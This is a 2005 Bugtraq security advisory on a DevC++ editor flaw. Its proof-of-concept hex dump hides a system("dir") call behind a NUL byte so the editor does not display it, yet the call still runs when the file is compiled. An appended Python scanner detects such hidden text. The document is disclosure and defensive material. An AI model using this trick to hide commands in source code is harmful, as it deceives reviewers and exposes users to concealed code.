Date: 18 Aug 2005 11:21:54 -0000
From: retrogod@...ceposta.it
To: bugtraq@...urityfocus.com
Subject: DevC++ V.4.9.9.2 NULL BYTE INSERTION / OBFUSCATION FLAW (by rgod)


DevC++ V.4.9.9.2 NULL BYTE INSERTION / OBFUSCATION FLAW

UPDATE TO HTTP://RGOD.ALTERVISTA.ORG/SYN.HTML
explaining Synedit component obfuscation flaw

exploit: a user can craft a malicious file using a null byte (%00) to obfuscate
code and hide malicious instructions from the victim user

poc:

this is a hexadecimal dump of the poc.cpp file

23 69 6e 63 6c 75 64 65 20 3c 69 6f 73 74 72 65    # i n c l u d e  < i o s t r e 
61 6d 2e 68 3e 0d 0a 23 69 6e 63 6c 75 64 65 20    a m . h >   # i n c l u d e  
3c 73 74 64 6c 69 62 2e 68 3e 0d 0a 0d 0a 69 6e    < s t d l i b . h >     i n 
74 20 6d 61 69 6e 28 29 0d 0a 7b 0d 0a 20 20 63    t  m a i n ( )   {     c 
6f 75 74 20 3c 3c 20 22 48 65 6c 6c 6f 20 57 6f    o u t  < <  " H e l l o  W o 
72 6c 64 21 22 3b 0d 0a 20 20 00 73 79 73 74 65    r l d ! " ;        s y s t e 
6d 20 28 22 64 69 72 22 29 3b 20 0d 0a 20 20 72    m  ( " d i r " ) ;      r 
65 74 75 72 6e 20 30 3b 0d 0a 7d 20 0d 0a 0d 0a    e t u r n  0 ;   }  

when you open it with DevC++, it looks like this:

#include <iostream.h>
#include <stdlib.h>

int main()
{
  cout << "Hello World!";
  
  return 0;

}

but when a victim user compiles and executes it

system ("dir");

will be executed anyway

rgod
site: http://rgod.altervista.org
mail: retrogod at aliceposta.it

original advisory: http://rgod.altervista.org/devcpp.html
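
Added example (not part of the original advisory and not rgod's code): a Python check that flags NUL bytes in source files and reports the text that follows them, for use before opening or building untrusted code. It assumes the editor stops rendering a line at its first NUL, as the display above suggests; the function names are hypothetical and the sample is constructed from the hex dump above.

```python
import sys

# Constructed sample: the body of poc.cpp, rebuilt from the hex dump above.
SAMPLE = (b'int main()\r\n{\r\n  cout << "Hello World!";\r\n'
          b'  \x00system ("dir"); \r\n  return 0;\r\n} \r\n')


def find_hidden_after_nul(data: bytes):
    """Return (line_no, column, hidden_text) for each line containing a NUL.

    hidden_text is what follows the first NUL on the line, i.e. the part an
    editor that cuts the line at NUL (assumption) would not display.
    """
    findings = []
    for line_no, line in enumerate(data.splitlines(), start=1):
        col = line.find(b"\x00")
        if col == -1:
            continue
        hidden = line[col + 1:].replace(b"\x00", b"")
        findings.append((line_no, col + 1, hidden.decode("latin-1").strip()))
    return findings


def editor_view(data: bytes) -> str:
    """Text as rendered when every line is cut at its first NUL (assumption)."""
    return "\n".join(line.split(b"\x00", 1)[0].decode("latin-1")
                     for line in data.splitlines())


def scan_file(path: str):
    with open(path, "rb") as fh:
        return find_hidden_after_nul(fh.read())


if __name__ == "__main__":
    paths = sys.argv[1:]
    if paths:
        results = {p: scan_file(p) for p in paths}
    else:
        results = {"<sample>": find_hidden_after_nul(SAMPLE)}
    dirty = False
    for name, hits in results.items():
        for line_no, col, hidden in hits:
            dirty = True
            print(f"{name}:{line_no}:{col}: NUL byte, hidden text: {hidden!r}")
    sys.exit(1 if dirty else 0)
```

Run with file paths as arguments; a non-zero exit status means at least one file contains a NUL byte and should be inspected in a hex viewer before it is compiled.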

